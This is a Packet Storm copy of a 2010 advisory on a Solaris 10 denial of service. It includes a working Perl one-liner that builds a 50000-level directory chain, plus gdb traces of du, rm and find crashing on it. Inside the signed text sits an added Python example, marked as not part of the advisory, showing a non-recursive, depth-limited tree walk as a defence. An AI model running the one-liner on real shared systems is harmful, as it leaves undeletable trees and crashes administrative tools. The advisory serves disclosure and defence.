Sun Solaris 10 filesystem rm(1),find(1),etc Denial Of Service

2010-05-22T00:00:00
ID PACKETSTORM:89800
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2010-05-22T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]  
  
Author: Maksymilian Arciemowicz  
SecurityReason.com  
Date:  
- - Dis.: 17.04.2010  
- - Pub.: 21.05.2010  
  
Affected Software:  
- - Sun Solaris 10 10/09  
  
Original URL:  
http://securityreason.com/achievement_securityalert/85  
  
  
- --- 0.Description ---  
Solaris is a Unix operating system introduced by Sun Microsystems in  
1992 as the successor to SunOS.  
  
Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle  
Corporation, selling computers, computer components, computer software,  
and information technology services. Sun was founded on February 24,  
1982. The company was headquartered in Santa Clara, California (part of  
Silicon Valley), on the former west campus of the Agnews Developmental  
Center.  
  
In computing, ZFS is a combined file system and logical volume manager  
designed by Sun Microsystems. The features of ZFS include support for  
high storage capacities, integration of the concepts of filesystem and  
volume management, snapshots and copy-on-write clones, continuous  
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.  
  
  
- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ---  
We can create a very deep directory tree; when we then remove, scan or otherwise  
traverse this tree, the affected program crashes with a stack overflow symptom.  
  
PoC:  
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'  
  
We need to use 1..8000 or a bigger value to cause the stack overflow.  
  
As a result:  
  
# du X  
Segmentation fault (core dumped)  
# /usr/local/bin/gdb -q du  
(no debugging symbols found)  
(gdb) r X  
Starting program: /usr/bin/du X  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1  
(gdb) x/i $eip  
0xfeedfc8a <_ndoprnt+12>: push %ebp  
  
We can simply remove this directory in the 1..8000 case:  
  
# rm -rf X  
#  
  
but let's try creating this one:  
  
# perl -e '$a="Y";for(1..50000){ ! -d $a and mkdir $a and chdir $a }'  
# rm -rf Y  
Segmentation fault (core dumped)  
  
rm(1) has failed!  
  
What is wrong? A stack overflow:  
  
# /usr/local/bin/gdb -q rm  
(no debugging symbols found)  
(gdb) r -rf Y  
Starting program: /usr/bin/rm -rf Y  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0x08051c03 in ?? ()  
(gdb) x/i $eip  
0x8051c03: push %ebx  
  
# find Y CX >> /dev/null  
Segmentation fault (core dumped)  
  
  
find(1) also fails!  
  
# /usr/local/bin/gdb -q find  
(no debugging symbols found)  
(gdb) r Y CX >> /dev/null  
Starting program: /usr/bin/find Y CX >> /dev/null  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1  
(gdb) x/i $eip  
0xfeecfc8a <_ndoprnt+12>: push %ebp  
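The three crashes above share one cause: du(1), rm(1) and find(1) descend the tree by recursion, so an attacker who can create directories chooses the stack depth. The added example below is not Sun's code and not part of the advisory; it is a constructed Python reimplementation of the same three operations (survey like du, depth-bounded scan like find, delete like rm -rf) driven by an explicit stack instead of recursion. It walks with chdir() so no path longer than one component is ever built (a 50000-deep chain exceeds PATH_MAX), re-checks the directory identity after every descent and ascent the way fts(3) does, and builds its own test tree with a dir_fd-relative mkdir() that mirrors the Perl one-liner. The depth limit, the exception name and the demo() helper are assumptions of this example; everything else is standard Python 3 os calls.

```python
"""Iterative, depth-bounded directory walk and removal (constructed example)."""
import os
import stat
import tempfile


class TreeTooDeep(Exception):
    """Raised when the walk meets a directory deeper than the configured limit."""


def make_deep_chain(root, depth, name="X"):
    """Create root/X/X/... nested `depth` levels, the shape of the advisory's
    Perl one-liner.  mkdir(dir_fd=) keeps every path one component long, so
    the chain can be far deeper than PATH_MAX would allow."""
    os.makedirs(root, exist_ok=True)
    fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for _ in range(depth):
            os.mkdir(name, dir_fd=fd)
            child = os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=fd)
            os.close(fd)
            fd = child
    finally:
        os.close(fd)


def _same_inode(a, b):
    return (a.st_dev, a.st_ino) == (b.st_dev, b.st_ino)


def _names_here():
    with os.scandir(".") as it:
        return [e.name for e in it]


def walk_tree(root, max_depth=None, remove=False):
    """Depth-first walk of `root` driven by an explicit stack, never recursion.

    Returns (dirs, files, deepest).  remove=True deletes entries on the way
    back up (rm -rf semantics; symlinks are unlinked, never followed).
    Raises TreeTooDeep when a directory lies deeper than max_depth and
    RuntimeError if a directory is swapped out while the walk is inside it.
    """
    saved_cwd = os.open(".", os.O_RDONLY | os.O_DIRECTORY)
    dirs = files = deepest = 0
    try:
        os.chdir(root)
        # one frame per ancestor: [name, unvisited child names, identity]
        stack = [[None, _names_here(), os.stat(".")]]
        while stack:
            pending = stack[-1][1]
            if pending:
                name = pending.pop()
                st = os.lstat(name)
                if not stat.S_ISDIR(st.st_mode):
                    files += 1
                    if remove:
                        os.unlink(name)
                    continue
                depth = len(stack)            # the root frame is depth 0
                if max_depth is not None and depth > max_depth:
                    raise TreeTooDeep(f"{name!r} lies at depth {depth} > {max_depth}")
                dirs += 1
                deepest = max(deepest, depth)
                os.chdir(name)
                # chdir() follows symlinks but lstat() did not: refuse to go on
                # if `name` was replaced by a link between the two calls.
                if not _same_inode(os.stat("."), st):
                    raise RuntimeError(f"{name!r} changed while being entered")
                stack.append([name, _names_here(), st])
                continue
            finished = stack.pop()            # every child handled: leave it
            if not stack:
                break                         # back at the root
            os.chdir("..")
            if not _same_inode(os.stat("."), stack[-1][2]):
                raise RuntimeError("parent directory changed during the walk")
            if remove:
                os.rmdir(finished[0])
    finally:
        os.fchdir(saved_cwd)
        os.close(saved_cwd)
    if remove:
        os.rmdir(root)
    return dirs, files, deepest


def demo(depth=10000, limit=100):
    """Build a chain `depth` deep in a fresh temp dir, survey it, show the
    depth guard firing, then remove it.  Returns the outcomes as a dict."""
    parent = tempfile.mkdtemp(prefix="deep-tree-")
    root = os.path.join(parent, "Y")
    make_deep_chain(root, depth)
    survey = walk_tree(root)                   # what du(1) needs to do
    try:
        walk_tree(root, max_depth=limit)       # a find(1)-style bounded scan
        guard_fired = False
    except TreeTooDeep:
        guard_fired = True
    removed = walk_tree(root, remove=True)     # what rm -rf needs to do
    root_gone = not os.path.exists(root)
    os.rmdir(parent)
    return {"survey": survey, "guard_fired": guard_fired,
            "removed": removed, "root_gone": root_gone}


if __name__ == "__main__":
    print(demo())
```

The default depth of 10000 is above the 8000 that crashed du(1) in the advisory and ten times Python's own recursion limit, so a recursive version of walk_tree would fail here exactly as the Solaris tools did. Open file descriptors stay constant (one saved cwd) rather than growing with depth, which is why the walk uses chdir()/".." plus inode checks instead of holding an openat() descriptor per level.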
  
  
- --- 2. Fix ---  
Sun Solaris will fix this issue.  
  
  
- --- 3. Greets ---  
sp3x Infospec pi3  
  
  
- --- 4. Contact ---  
Author: SecurityReason.com [ Maksymilian Arciemowicz ]  
Email:  
- - cxib {a\./t] securityreason [d=t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://securityreason.com/  
http://securityreason.com/exploit_alert/ - Exploit Database  
http://securityreason.com/security_alert/ - Vulnerability Database  
  
-----BEGIN PGP SIGNATURE-----  
  
iEYEARECAAYFAkv2fyAACgkQpiCeOKaYa9ZQAwCfUrpH2glAhxCZVwpvOTKp8F38  
ssYAoMKcw4CX0hjK2CsCEkIAVyO5OB6e  
=dQfV  
-----END PGP SIGNATURE-----  
  